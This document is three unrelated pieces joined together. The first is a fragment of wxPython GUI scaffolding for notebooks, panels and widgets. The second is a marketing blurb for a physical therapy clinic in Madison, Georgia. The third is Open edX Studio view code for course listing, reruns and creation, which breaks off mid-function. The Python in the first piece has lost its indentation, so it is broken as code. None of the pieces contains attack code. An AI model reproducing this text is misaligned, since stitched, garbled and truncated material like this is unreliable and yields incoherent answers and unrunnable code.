self._pages = [];
for index, item in enumerate(sibling._children):
item.initObj();
self._pages.append(item._obj)
self.AddPage(self._pages[index], item._name);
self.NBSizer = wx.BoxSizer();
self.NBSizer.Add(self,1,wx.EXPAND)
sibling._parent._obj.SetSizer(self.NBSizer)
# our notebook class that collates information before making a wx.Notebook notebook
class Notebook:
# the implicit self argument
# parent panel object
# the pages to be added to this notebook
# and the names of the pages
_register = []
_typeName = "Notebook"
def __init__(self,parent, **kwargs):
# instantiate the notebook
self._parent = parent;
# an instance variable holding other instances that are children of this instance
self._children = [];
self._pages = [];
# append this instance to a list belonging to the parent, so that the parent knows
parent._children.append(self);
def initObj(self):
# our wxNotebook method initiates the instantiation of the self._children objects
self._obj = wx.Notebook(self._parent._obj)
# create a wxNotebook instance and store it in self._obj; pass 'self' as the argument
# i.e., we pass this instance of Notebook as the 'sibling' argument (the wxNotebook 'self' is implicit)
##self._obj = wxNotebook(self)
for index, item in enumerate(self._children):
item.initObj();
self._pages.append(item._obj);
self._obj.AddPage(self._pages[index], item._name);
self.NBSizer = wx.BoxSizer();
self.NBSizer.Add(self._obj, 1, wx.EXPAND)
self._parent._obj.SetSizer(self.NBSizer)
Notebook._register.append(self)
def customBehavior(self):
pass
# i think this has to be incorporated in the wxNotebook class, rather than here;
def OnPageChanging(self,event):
oldPage = event.GetOldSelection()
newPage = event.GetSelection()
self.customBehavior()
class wxPanel(wx.Panel):
def __init__(self,sibling):
wx.Panel.__init__(self,parent=sibling._parent._obj);
self._needsSizer = True;
for obj in sibling._children:
if obj._typeName == "Notebook":
self._needsSizer = False;
break
if self._needsSizer:
self.grid = wx.GridBagSizer(hgap=5,vgap=5);
self.SetSizer(self.grid);
# call the init methods of the objects, which then places wxWidget objects in the self._widgets variable for
# each Widget class instance
# a panel holding a notebook will never have a widget - it's a dummy panel
# if it does, this is where an error will be thrown!
for child in sibling._children:
if child._typeName == "Widget":
child.initObj(self);
self.grid.Add(child._obj, pos=child._pos, span=child._span, flag=child._gridFlags)
# if the base child widget object is a label, it won't have a function
if ((child._function is not None) and (child._wxEvt is not None)):
self.Bind(child._wxEvt,child._function,child._obj)
if child._label is not None:
# we know that this will be a label;
child._labelObj = wx.StaticText(self,label=child._label)
self.grid.Add(child._labelObj,child._labelPos, child._labelSpan)
if (child._hasSlave):
self.Bind(child._wxEvt, child.masterFunction, child._obj)
# some objects are initially hidden; here, we hide them.
if (child._initHide):
child._obj.Hide()
if (child._label is not None):
child._labelObj.Hide()
self.Layout()
# in this class, we collate all the information we'll need to make a well-defined wx.Panel object
class Panel:
# what do we require from the user to instantiate a base panel object?
# make an iterable list of panel instances; make sure methods only access this /after/
# the main frame has added all objects (i.e., at the end of the user's GUI script!)
_register = []
# all instances of this class have the _typeName = "Panel"
_typeName = "Panel"
def __init__(self, parent,**kwargs):
# a list of widget objects, from our widgets class, that identify this panel as their parent panel
# note that we do /not/ need more information, as this has the instanced objects; we can call their methods
# directly from here! Very convenient.
self._widgets = [];
# panel must have parent object on which it is displayed
self._parent = parent;
# a list of the instances that have this instance of the Panel class as their parent
self._children = []
parent._children.append(self);
# we use a name if this panel is a child of a Notebook object; in this case, the name is
# displayed atop the notebook
self._name = kwargs.get("name",None)
def initObj(self):
# we initialize the panel, which then refers to all of the panel's widgets' methods for their instantiation
self._obj = wxPanel(self);
# append this instance to the class register, so that we may iterate over the class instances if needed
Panel._register.append(self);
# iterate over self._children, and initialize objects that are /not/ of the type widget; these will
# be initialized in the wxPanel class!
for obj in self._children:
if (obj._typeName != "Widget"):
obj.initObj()
def deleteWidget(self):
pass
def bindToFunction(self):
# note: we might have already done this in the widget class; it could be better that way.
pass
#class wxWidget:
# def __init__(self,sibling):
# self._widget = None;
# if sibling._
class Widget:
_register = []
_typeName = "Widget"
# for all Widget objects, we need the parent object, widgetType, name, and position
def __init__(self,parent,widgetType,name,pos,**kwargs):
# note that we use **kwargs to pass in information that may be specific to certain type
# of widget; e.g., text widget vs button vs ... etc.
# **kwargs is a list of KeyWord ARGumentS (kwargs) of arbitrary length
# note that, by default, there is no label (and no label position <(int,int)>) provided
#####################
# Required arguments, for all widget types
#####################
self._parent = parent; # parent object, typically an instance of Panel
self._widgetType = widgetType; # button, textwidget, label, etc.
self._name = name; #string
self._pos = pos; #tuple of coords: "(integer, integer)"
#####################
# Required arguments, for some widget types
#####################
# required for choice widgets
self._choices = kwargs.get('choices',None)
############################
# optional arguments
# we can specify a label (if so, must specify a position)
# the spans of the label and widget default to (1,1)
# if a widget can use an initial value (e.g., a text control), it defaults to an empty string
# if a widget is to be bound to a function, must specify this explicitly or bind to it later
############################
self._label = kwargs.get('label',None)
self._labelPos = kwargs.get('labelPos',None)
# default behavior of span is (1,1) if not specified
self._span = kwargs.get('span',(1,1))
self._labelSpan = kwargs.get('labelSpan',(1,1))
self._initValue = kwargs.get('value',"")
self._function = kwargs.get('function',None)
self._wxEvt = None
self._hasMaster = False; # default this to false; changed if the setMaster() function is called on self
self._hasSlave = False;
# these will be instantiated during the creation of the parent object
self._labelObj = None;
self._obj = None;
# Hide most objects at first; that way, they only show if they are told to show,
# and otherwise will hide when told to hide
# implement this /after/ we have connected all the show/hide functionality
self._initHide = False;
# TODO: have the Panel's grid.Add() method use these flags when instantiating the widget
self._gridFlags = (wx.RESERVE_SPACE_EVEN_IF_HIDDEN | wx.EXPAND | wx.ALIGN_CENTER)
# append the object to the list of children in the parent instance
parent._children.append(self)
# the master widget - this is a /Widget/ instance
self._masters = []
# denotes messages from master that instruct self to Hide()
# these should be strings
self._hideWhen = []
# widgets to which self is master; note that this is set implicitly via setMaster, when
# other widgets denotes self as master
# this is a /Widget/ instance (not a wx object)
self._slaves = []
Widget._register.append(self); # append this instance to the class register
# allows the function to which the widget will be bound to be set after construction of the widget instance
# we allow the function to be defined according to whatever parameters the user inputs; no implicit self
def masterFunction(self,event):
# pass the value of this widget to slaved widgets
message = str(event.GetString())
for slave in self._slaves:
slave.evaluateMessage(message);
def evaluateMessage(self,message):
# this is used by the interface to loop over child widgets
# in the event that a chosen selection hides multiple levels of the parent-child hierarchy.
# continues until exhaustion
if message in self._hideWhen:
self._obj.Hide()
if (self._labelObj is not None):
self._labelObj.Hide()
self._parent._obj.Layout()
else:
self._obj.Show()
if (self._labelObj is not None):
self._labelObj.Show()
self._parent._obj.Layout()
def setMaster(self, master, hideWhen):
self._masters.append(master)
# assume hideWhen is in the form of an array
for instruction in hideWhen:
self._hideWhen.append(instruction)
# append self to master._slaves[]
master._slaves.append(self);
self._hasMaster = True;
if master._hasSlave == False:
master._hasSlave = True;
def setFunction(self,function):
self._function = function;
def setGridFlags(self,flags):
self._gridFlags = flags;
def setInitHide(self,boolean):
self._initHide = boolean;
# maybe the user wants to attach labels later; allow them to do so here
def setLabel(self,label,labelPos,**kwargs):
self._label = label;
self._labelPos = labelPos;
self._labelSpan = kwargs.get('labelSpan',(1,1))
# this is a bottom level object; it requires a parentInstance on initialization
def initObj(self,parentInstance):
# for each, initialize the wx object in self._obj, and inform the class what kind of wx event to
# expect in self._wxEvt
#self._obj = wxWidget(self)
if (self._widgetType == "text"):
self._obj = wx.TextCtrl(parentInstance,value=self._initValue,name=self._name)
self._wxEvt = wx.EVT_TEXT
# need to add all types of widgets here; remember to overload necessary parameters for each via kwargs.get()
elif (self._widgetType == "choice"):
#choicesList
if (self._choices is None):
raise ValueError('%s has no choices! Please specify choices for the choice widget.' %(self._name))
self._obj = wx.Choice(parentInstance,-1,choices=self._choices,name=self._name)
self._wxEvt = wx.EVT_CHOICE
# more types of widgets to be implemented
elif (self._widgetType == "button"):
if (self._name is None):
raise ValueError('%s has no name! The name of the button is displayed on the button, and \n\
is required!' %(self._name))
self._obj = wx.Button(parentInstance,label=self._name, name=self._name)
self._wxEvt = wx.EVT_BUTTON
elif (self._widgetType == "static"):
self._obj = wx.StaticText(parentInstance,label=self._name, name=self._name)
self._wxEvt = None
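The parent-child registration pattern these classes rely on (each constructor appending `self` to its parent's `_children`, a class-level `_register`, and depth-first `initObj()` calls) can be sketched without wx. The `Node` class below is a hypothetical stand-in, not part of the template:

```python
# A wx-free sketch of the registration pattern used by Frame/Panel/Widget above.
class Node:
    _register = []           # class-level list of every initialized instance

    def __init__(self, parent=None, name=""):
        self._parent = parent
        self._name = name
        self._children = []  # instances that declare this node as their parent
        if parent is not None:
            parent._children.append(self)

    def initObj(self):
        # depth-first initialization, mirroring Frame.initObj()/Panel.initObj()
        Node._register.append(self)
        for child in self._children:
            child.initObj()

root = Node(name="frame")
panel = Node(parent=root, name="panel")
widget = Node(parent=panel, name="widget")
root.initObj()
```

Calling `initObj()` on the root walks the whole tree, so a single call at the end of the user's script initializes every registered object in parent-before-child order.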
|
The Madison, GA East Athens Physical Therapy clinic was established in 2003. This clinic features a 6400 sq. ft. free-standing building with abundant parking. Our 3000 sq. ft. running/plyometric space allows us to rehab local athletes and post-op patients to their fullest potential. The Madison, GA clinic supports and serves the Morgan County High School population.
Our convenient location on East Avenue across from the Aquatics Center and Morgan County Primary School allows us to serve the physical therapy needs of numerous towns and cities near Madison, GA. If you live in or around Madison, GA, Rutledge, GA, Bostwick, GA, Appalachee, GA, Buckhead, GA, Good Hope, GA, Social Circle, GA, Mansfield, GA, Newborn, GA, Eatonton, GA, or Covington, GA, contact us to schedule an appointment today.
From Athens: Take 441 South and turn right on East Avenue; East Athens Physical Therapy, at 1541 Buckhead Road, is a quarter of a mile up on the left, across from the elementary school parking lot.
|
"""
Views related to operations on course objects
"""
from django.shortcuts import redirect
import json
import random
import string # pylint: disable=deprecated-module
import logging
from django.utils.translation import ugettext as _
import django.utils
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.views.decorators.http import require_http_methods, require_GET
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import HttpResponseBadRequest, HttpResponseNotFound, HttpResponse, Http404
from util.json_request import JsonResponse, JsonResponseBadRequest
from util.date_utils import get_default_time_display
from util.db import generate_int_id, MYSQL_MAX_INT
from edxmako.shortcuts import render_to_response
from xmodule.course_module import DEFAULT_START_DATE
from xmodule.error_module import ErrorDescriptor
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.courseware_index import CoursewareSearchIndexer, SearchIndexingError
from xmodule.contentstore.content import StaticContent
from xmodule.tabs import PDFTextbookTabs
from xmodule.partitions.partitions import UserPartition
from xmodule.modulestore import EdxJSONEncoder
from xmodule.modulestore.exceptions import ItemNotFoundError, DuplicateCourseError
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locations import Location
from opaque_keys.edx.keys import CourseKey
from openedx.core.djangoapps.course_groups.partition_scheme import get_cohorted_user_partition
from django_future.csrf import ensure_csrf_cookie
from contentstore.course_info_model import get_course_updates, update_course_updates, delete_course_update
from contentstore.utils import (
add_instructor,
initialize_permissions,
get_lms_link_for_item,
add_extra_panel_tab,
remove_extra_panel_tab,
reverse_course_url,
reverse_library_url,
reverse_usage_url,
reverse_url,
remove_all_instructors,
)
from models.settings.course_details import CourseDetails, CourseSettingsEncoder
from models.settings.course_grading import CourseGradingModel
from models.settings.course_metadata import CourseMetadata
from util.json_request import expect_json
from util.string_utils import _has_non_ascii_characters
from student.auth import has_studio_write_access, has_studio_read_access
from .component import (
OPEN_ENDED_COMPONENT_TYPES,
NOTE_COMPONENT_TYPES,
ADVANCED_COMPONENT_POLICY_KEY,
SPLIT_TEST_COMPONENT_TYPE,
ADVANCED_COMPONENT_TYPES,
)
from contentstore.tasks import rerun_course
from contentstore.views.entrance_exam import (
create_entrance_exam,
update_entrance_exam,
delete_entrance_exam
)
from .library import LIBRARIES_ENABLED
from .item import create_xblock_info
from course_creators.views import get_course_creator_status, add_user_with_status_unrequested
from contentstore import utils
from student.roles import (
CourseInstructorRole, CourseStaffRole, CourseCreatorRole, GlobalStaff, UserBasedRole
)
from student import auth
from course_action_state.models import CourseRerunState, CourseRerunUIStateManager
from course_action_state.managers import CourseActionStateItemNotFoundError
from microsite_configuration import microsite
from xmodule.course_module import CourseFields
from xmodule.split_test_module import get_split_user_partitions
from student.auth import has_course_author_access
from util.milestones_helpers import (
set_prerequisite_courses,
is_valid_course_key
)
MINIMUM_GROUP_ID = 100
RANDOM_SCHEME = "random"
COHORT_SCHEME = "cohort"
# Note: the following content group configuration strings are not
# translated since they are not visible to users.
CONTENT_GROUP_CONFIGURATION_DESCRIPTION = 'The groups in this configuration can be mapped to cohort groups in the LMS.'
CONTENT_GROUP_CONFIGURATION_NAME = 'Content Group Configuration'
__all__ = ['course_info_handler', 'course_handler', 'course_listing',
'course_info_update_handler', 'course_search_index_handler',
'course_rerun_handler',
'settings_handler',
'grading_handler',
'advanced_settings_handler',
'course_notifications_handler',
'textbooks_list_handler', 'textbooks_detail_handler',
'group_configurations_list_handler', 'group_configurations_detail_handler']
log = logging.getLogger(__name__)
class AccessListFallback(Exception):
"""
An exception that is raised whenever we need to `fall back` to fetching *all* courses
available to a user, rather than using a shorter method (i.e. fetching by group)
"""
pass
def get_course_and_check_access(course_key, user, depth=0):
"""
Internal method used to calculate and return the locator and course module
for the view functions in this file.
"""
if not has_studio_read_access(user, course_key):
raise PermissionDenied()
course_module = modulestore().get_course(course_key, depth=depth)
return course_module
def reindex_course_and_check_access(course_key, user):
"""
Internal method used to restart indexing on a course.
"""
if not has_course_author_access(user, course_key):
raise PermissionDenied()
return CoursewareSearchIndexer.do_course_reindex(modulestore(), course_key)
@login_required
def course_notifications_handler(request, course_key_string=None, action_state_id=None):
"""
Handle incoming requests for notifications in a RESTful way.
course_key_string and action_state_id must both be set; else a HttpBadResponseRequest is returned.
For each of these operations, the requesting user must have access to the course;
else a PermissionDenied error is returned.
GET
json: return json representing information about the notification (action, state, etc)
DELETE
json: return json representing success or failure of dismissal/deletion of the notification
PUT
Raises a NotImplementedError.
POST
Raises a NotImplementedError.
"""
# ensure that we have a course and an action state
if not course_key_string or not action_state_id:
return HttpResponseBadRequest()
response_format = request.REQUEST.get('format', 'html')
course_key = CourseKey.from_string(course_key_string)
if response_format == 'json' or 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
if not has_studio_write_access(request.user, course_key):
raise PermissionDenied()
if request.method == 'GET':
return _course_notifications_json_get(action_state_id)
elif request.method == 'DELETE':
# we assume any delete requests dismiss actions from the UI
return _dismiss_notification(request, action_state_id)
elif request.method == 'PUT':
raise NotImplementedError()
elif request.method == 'POST':
raise NotImplementedError()
else:
return HttpResponseBadRequest()
else:
return HttpResponseNotFound()
def _course_notifications_json_get(course_action_state_id):
"""
Return the action and the action state for the given id
"""
try:
action_state = CourseRerunState.objects.find_first(id=course_action_state_id)
except CourseActionStateItemNotFoundError:
return HttpResponseBadRequest()
action_state_info = {
'action': action_state.action,
'state': action_state.state,
'should_display': action_state.should_display
}
return JsonResponse(action_state_info)
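The JSON body that `_course_notifications_json_get` serializes carries three fields. A hedged sketch of the payload shape, with illustrative values rather than data from a real course action state:

```python
import json

# Example notification payload; field values here are illustrative only.
action_state_info = {
    'action': 'rerun',          # the course action this state tracks
    'state': 'in_progress',     # current state reported by the state manager
    'should_display': True,     # whether the UI should still show the notice
}

# JsonResponse serializes a dict like this to a JSON body; json.dumps shows
# the equivalent round trip.
body = json.dumps(action_state_info)
decoded = json.loads(body)
```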
def _dismiss_notification(request, course_action_state_id): # pylint: disable=unused-argument
"""
Update the display of the course notification
"""
try:
action_state = CourseRerunState.objects.find_first(id=course_action_state_id)
except CourseActionStateItemNotFoundError:
# Can't dismiss a notification that doesn't exist in the first place
return HttpResponseBadRequest()
if action_state.state == CourseRerunUIStateManager.State.FAILED:
# We remove all permissions for this course key at this time, since
# no further access is required to a course that failed to be created.
remove_all_instructors(action_state.course_key)
# The CourseRerunState is no longer needed by the UI; delete
action_state.delete()
return JsonResponse({'success': True})
# pylint: disable=unused-argument
@login_required
def course_handler(request, course_key_string=None):
"""
The restful handler for course specific requests.
It provides the course tree with the necessary information for identifying and labeling the parts. The root
will typically be a 'course' object but may not be, especially as we support modules.
GET
html: return course listing page if not given a course id
html: return html page overview for the given course if given a course id
json: return json representing the course branch's index entry as well as dag w/ all of the children
replaced w/ json docs where each doc has {'_id': , 'display_name': , 'children': }
POST
json: create a course, return resulting json
descriptor (same as in GET course/...). Leaving off /branch/draft would imply create the course w/ default
branches. Cannot change the structure contents ('_id', 'display_name', 'children') but can change the
index entry.
PUT
json: update this course (index entry not xblock) such as repointing head, changing display name, org,
course, run. Return same json as above.
DELETE
json: delete this branch from this course (leaving off /branch/draft would imply delete the course)
"""
try:
response_format = request.REQUEST.get('format', 'html')
if response_format == 'json' or 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
if request.method == 'GET':
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user, depth=None)
return JsonResponse(_course_outline_json(request, course_module))
elif request.method == 'POST': # not sure if this is only post. If one will have ids, it goes after access
return _create_or_rerun_course(request)
elif not has_studio_write_access(request.user, CourseKey.from_string(course_key_string)):
raise PermissionDenied()
elif request.method == 'PUT':
raise NotImplementedError()
elif request.method == 'DELETE':
raise NotImplementedError()
else:
return HttpResponseBadRequest()
elif request.method == 'GET': # assume html
if course_key_string is None:
return redirect(reverse("home"))
else:
return course_index(request, CourseKey.from_string(course_key_string))
else:
return HttpResponseNotFound()
except InvalidKeyError:
raise Http404
@login_required
@ensure_csrf_cookie
@require_http_methods(["GET"])
def course_rerun_handler(request, course_key_string):
"""
The restful handler for course reruns.
GET
html: return html page with form to rerun a course for the given course id
"""
# Only global staff (PMs) are able to rerun courses during the soft launch
if not GlobalStaff().has_user(request.user):
raise PermissionDenied()
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user, depth=3)
if request.method == 'GET':
return render_to_response('course-create-rerun.html', {
'source_course_key': course_key,
'display_name': course_module.display_name,
'user': request.user,
'course_creator_status': _get_course_creator_status(request.user),
'allow_unicode_course_id': settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID', False)
})
@login_required
@ensure_csrf_cookie
@require_GET
def course_search_index_handler(request, course_key_string):
"""
The restful handler for course indexing.
GET
html: return status of indexing task
json: return status of indexing task
"""
# Only global staff (PMs) are able to index courses
if not GlobalStaff().has_user(request.user):
raise PermissionDenied()
course_key = CourseKey.from_string(course_key_string)
content_type = request.META.get('CONTENT_TYPE', None)
if content_type is None:
content_type = "application/json; charset=utf-8"
with modulestore().bulk_operations(course_key):
try:
reindex_course_and_check_access(course_key, request.user)
except SearchIndexingError as search_err:
return HttpResponse(json.dumps({
"user_message": search_err.error_list
}), content_type=content_type, status=500)
return HttpResponse(json.dumps({
"user_message": _("Course has been successfully reindexed.")
}), content_type=content_type, status=200)
def _course_outline_json(request, course_module):
"""
Returns a JSON representation of the course module and recursively all of its children.
"""
return create_xblock_info(
course_module,
include_child_info=True,
course_outline=True,
include_children_predicate=lambda xblock: not xblock.category == 'vertical'
)
def _accessible_courses_list(request):
"""
List all courses available to the logged in user by iterating through all the courses
"""
def course_filter(course):
"""
Filter out unusable and inaccessible courses
"""
if isinstance(course, ErrorDescriptor):
return False
# pylint: disable=fixme
# TODO remove this condition when templates purged from db
if course.location.course == 'templates':
return False
return has_studio_read_access(request.user, course.id)
courses = filter(course_filter, modulestore().get_courses())
in_process_course_actions = [
course for course in
CourseRerunState.objects.find_all(
exclude_args={'state': CourseRerunUIStateManager.State.SUCCEEDED}, should_display=True
)
if has_studio_read_access(request.user, course.course_key)
]
return courses, in_process_course_actions
def _accessible_courses_list_from_groups(request):
"""
List all courses available to the logged in user by reversing access group names
"""
courses_list = {}
in_process_course_actions = []
instructor_courses = UserBasedRole(request.user, CourseInstructorRole.ROLE).courses_with_role()
staff_courses = UserBasedRole(request.user, CourseStaffRole.ROLE).courses_with_role()
all_courses = instructor_courses | staff_courses
for course_access in all_courses:
course_key = course_access.course_id
if course_key is None:
# If the course_access does not have a course_id, it's an org-based role, so we fall back
raise AccessListFallback
if course_key not in courses_list:
# check for any course action state for this course
in_process_course_actions.extend(
CourseRerunState.objects.find_all(
exclude_args={'state': CourseRerunUIStateManager.State.SUCCEEDED},
should_display=True,
course_key=course_key,
)
)
# check for the course itself
try:
course = modulestore().get_course(course_key)
except ItemNotFoundError:
# If a user has access to a course that doesn't exist, don't do anything with that course
course = None
if course is not None and not isinstance(course, ErrorDescriptor):
# ignore deleted or errored courses
courses_list[course_key] = course
return courses_list.values(), in_process_course_actions
def _accessible_libraries_list(user):
"""
List all libraries available to the logged in user by iterating through all libraries
"""
# No need to worry about ErrorDescriptors - split's get_libraries() never returns them.
return [lib for lib in modulestore().get_libraries() if has_studio_read_access(user, lib.location.library_key)]
@login_required
@ensure_csrf_cookie
def course_listing(request):
"""
List all courses available to the logged in user
"""
courses, in_process_course_actions = get_courses_accessible_to_user(request)
libraries = _accessible_libraries_list(request.user) if LIBRARIES_ENABLED else []
    def format_in_process_course_view(uca):
        """
        Return a dict of the data which the view requires for each course
        rerun action that has not yet succeeded.
        """
return {
'display_name': uca.display_name,
'course_key': unicode(uca.course_key),
'org': uca.course_key.org,
'number': uca.course_key.course,
'run': uca.course_key.run,
            'is_failed': uca.state == CourseRerunUIStateManager.State.FAILED,
            'is_in_progress': uca.state == CourseRerunUIStateManager.State.IN_PROGRESS,
'dismiss_link': reverse_course_url(
'course_notifications_handler',
uca.course_key,
kwargs={
'action_state_id': uca.id,
},
) if uca.state == CourseRerunUIStateManager.State.FAILED else ''
}
def format_library_for_view(library):
"""
Return a dict of the data which the view requires for each library
"""
return {
'display_name': library.display_name,
'library_key': unicode(library.location.library_key),
'url': reverse_library_url('library_handler', unicode(library.location.library_key)),
'org': library.display_org_with_default,
'number': library.display_number_with_default,
'can_edit': has_studio_write_access(request.user, library.location.library_key),
}
courses = _remove_in_process_courses(courses, in_process_course_actions)
in_process_course_actions = [format_in_process_course_view(uca) for uca in in_process_course_actions]
return render_to_response('index.html', {
'courses': courses,
'in_process_course_actions': in_process_course_actions,
'libraries_enabled': LIBRARIES_ENABLED,
'libraries': [format_library_for_view(lib) for lib in libraries],
'user': request.user,
'request_course_creator_url': reverse('contentstore.views.request_course_creator'),
'course_creator_status': _get_course_creator_status(request.user),
'rerun_creator_status': GlobalStaff().has_user(request.user),
'allow_unicode_course_id': settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID', False),
'allow_course_reruns': settings.FEATURES.get('ALLOW_COURSE_RERUNS', True)
})
def _get_rerun_link_for_item(course_key):
""" Returns the rerun link for the given course key. """
return reverse_course_url('course_rerun_handler', course_key)
@login_required
@ensure_csrf_cookie
def course_index(request, course_key):
"""
Display an editable course overview.
org, course, name: Attributes of the Location for the item to edit
"""
# A depth of None implies the whole course. The course outline needs this in order to compute has_changes.
# A unit may not have a draft version, but one of its components could, and hence the unit itself has changes.
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user, depth=None)
lms_link = get_lms_link_for_item(course_module.location)
reindex_link = None
if settings.FEATURES.get('ENABLE_COURSEWARE_INDEX', False):
reindex_link = "/course/{course_id}/search_reindex".format(course_id=unicode(course_key))
sections = course_module.get_children()
course_structure = _course_outline_json(request, course_module)
locator_to_show = request.REQUEST.get('show', None)
course_release_date = get_default_time_display(course_module.start) if course_module.start != DEFAULT_START_DATE else _("Unscheduled")
settings_url = reverse_course_url('settings_handler', course_key)
try:
current_action = CourseRerunState.objects.find_first(course_key=course_key, should_display=True)
except (ItemNotFoundError, CourseActionStateItemNotFoundError):
current_action = None
return render_to_response('course_outline.html', {
'context_course': course_module,
'lms_link': lms_link,
'sections': sections,
'course_structure': course_structure,
'initial_state': course_outline_initial_state(locator_to_show, course_structure) if locator_to_show else None,
'course_graders': json.dumps(
CourseGradingModel.fetch(course_key).graders
),
'rerun_notification_id': current_action.id if current_action else None,
'course_release_date': course_release_date,
'settings_url': settings_url,
'reindex_link': reindex_link,
'notification_dismiss_url': reverse_course_url(
'course_notifications_handler',
current_action.course_key,
kwargs={
'action_state_id': current_action.id,
},
) if current_action else None,
})
def get_courses_accessible_to_user(request):
"""
Try to get all courses by first reversing django groups and fallback to old method if it fails
Note: overhead of pymongo reads will increase if getting courses from django groups fails
"""
if GlobalStaff().has_user(request.user):
# user has global access so no need to get courses from django groups
courses, in_process_course_actions = _accessible_courses_list(request)
else:
try:
courses, in_process_course_actions = _accessible_courses_list_from_groups(request)
except AccessListFallback:
            # the user has some old groups or there was an error getting courses from
            # django groups, so fall back to iterating through all courses
courses, in_process_course_actions = _accessible_courses_list(request)
return courses, in_process_course_actions
def _remove_in_process_courses(courses, in_process_course_actions):
"""
removes any in-process courses in courses list. in-process actually refers to courses
that are in the process of being generated for re-run
"""
def format_course_for_view(course):
"""
Return a dict of the data which the view requires for each course
"""
return {
'display_name': course.display_name,
'course_key': unicode(course.location.course_key),
'url': reverse_course_url('course_handler', course.id),
'lms_link': get_lms_link_for_item(course.location),
'rerun_link': _get_rerun_link_for_item(course.id),
'org': course.display_org_with_default,
'number': course.display_number_with_default,
'run': course.location.run
}
in_process_action_course_keys = [uca.course_key for uca in in_process_course_actions]
courses = [
format_course_for_view(c)
for c in courses
if not isinstance(c, ErrorDescriptor) and (c.id not in in_process_action_course_keys)
]
return courses
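# As a standalone illustration of the filtering that _remove_in_process_courses
# performs, the sketch below drops every course whose id matches an in-process
# rerun action. The Course/Action namedtuples are made-up stand-ins for the real
# modulestore and course_action_state objects.

```python
from collections import namedtuple

Course = namedtuple('Course', ['id', 'display_name'])
Action = namedtuple('Action', ['course_key'])

courses = [Course('org/demo/2015', 'Demo'), Course('org/rerun/2015', 'Rerun')]
in_process = [Action('org/rerun/2015')]

# build the set of keys with pending rerun actions, then filter them out
in_process_keys = {action.course_key for action in in_process}
visible = [course for course in courses if course.id not in in_process_keys]
print([course.display_name for course in visible])  # ['Demo']
```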
def course_outline_initial_state(locator_to_show, course_structure):
"""
Returns the desired initial state for the course outline view. If the 'show' request parameter
was provided, then the view's initial state will be to have the desired item fully expanded
and to scroll to see the new item.
"""
def find_xblock_info(xblock_info, locator):
"""
Finds the xblock info for the specified locator.
"""
if xblock_info['id'] == locator:
return xblock_info
children = xblock_info['child_info']['children'] if xblock_info.get('child_info', None) else None
if children:
for child_xblock_info in children:
result = find_xblock_info(child_xblock_info, locator)
if result:
return result
return None
def collect_all_locators(locators, xblock_info):
"""
Collect all the locators for an xblock and its children.
"""
locators.append(xblock_info['id'])
children = xblock_info['child_info']['children'] if xblock_info.get('child_info', None) else None
if children:
for child_xblock_info in children:
collect_all_locators(locators, child_xblock_info)
selected_xblock_info = find_xblock_info(course_structure, locator_to_show)
if not selected_xblock_info:
return None
expanded_locators = []
collect_all_locators(expanded_locators, selected_xblock_info)
return {
'locator_to_show': locator_to_show,
'expanded_locators': expanded_locators
}
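# The two nested helpers in course_outline_initial_state are a plain depth-first
# search over the xblock-info dict shape. A self-contained sketch of that
# pattern follows, using a simplified outline structure with made-up locator ids.

```python
def find_xblock_info(xblock_info, locator):
    """Depth-first search for the node whose 'id' matches locator."""
    if xblock_info['id'] == locator:
        return xblock_info
    child_info = xblock_info.get('child_info') or {}
    for child in child_info.get('children', []):
        result = find_xblock_info(child, locator)
        if result:
            return result
    return None

def collect_all_locators(locators, xblock_info):
    """Accumulate the id of a node and all of its descendants."""
    locators.append(xblock_info['id'])
    child_info = xblock_info.get('child_info') or {}
    for child in child_info.get('children', []):
        collect_all_locators(locators, child)

outline = {
    'id': 'course',
    'child_info': {'children': [
        {'id': 'chapter-1', 'child_info': {'children': [
            {'id': 'sequential-1'},
        ]}},
        {'id': 'chapter-2'},
    ]},
}

selected = find_xblock_info(outline, 'chapter-1')
expanded = []
collect_all_locators(expanded, selected)
print(expanded)  # ['chapter-1', 'sequential-1']
```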
@expect_json
def _create_or_rerun_course(request):
"""
To be called by requests that create a new destination course (i.e., create_new_course and rerun_course)
Returns the destination course_key and overriding fields for the new course.
Raises DuplicateCourseError and InvalidKeyError
"""
if not auth.has_access(request.user, CourseCreatorRole()):
raise PermissionDenied()
try:
org = request.json.get('org')
course = request.json.get('number', request.json.get('course'))
display_name = request.json.get('display_name')
# force the start date for reruns and allow us to override start via the client
start = request.json.get('start', CourseFields.start.default)
run = request.json.get('run')
# allow/disable unicode characters in course_id according to settings
if not settings.FEATURES.get('ALLOW_UNICODE_COURSE_ID'):
if _has_non_ascii_characters(org) or _has_non_ascii_characters(course) or _has_non_ascii_characters(run):
return JsonResponse(
{'error': _('Special characters not allowed in organization, course number, and course run.')},
status=400
)
fields = {'start': start}
if display_name is not None:
fields['display_name'] = display_name
if 'source_course_key' in request.json:
return _rerun_course(request, org, course, run, fields)
else:
return _create_new_course(request, org, course, run, fields)
except DuplicateCourseError:
return JsonResponse({
'ErrMsg': _(
'There is already a course defined with the same '
'organization and course number. Please '
'change either organization or course number to be unique.'
),
'OrgErrMsg': _(
'Please change either the organization or '
'course number so that it is unique.'),
'CourseErrMsg': _(
'Please change either the organization or '
'course number so that it is unique.'),
})
except InvalidKeyError as error:
return JsonResponse({
"ErrMsg": _("Unable to create course '{name}'.\n\n{err}").format(name=display_name, err=error.message)}
)
def _create_new_course(request, org, number, run, fields):
"""
Create a new course.
Returns the URL for the course overview page.
Raises DuplicateCourseError if the course already exists
"""
store_for_new_course = modulestore().default_modulestore.get_modulestore_type()
new_course = create_new_course_in_store(store_for_new_course, request.user, org, number, run, fields)
return JsonResponse({
'url': reverse_course_url('course_handler', new_course.id),
'course_key': unicode(new_course.id),
})
def create_new_course_in_store(store, user, org, number, run, fields):
"""
Create course in store w/ handling instructor enrollment, permissions, and defaulting the wiki slug.
Separated out b/c command line course creation uses this as well as the web interface.
"""
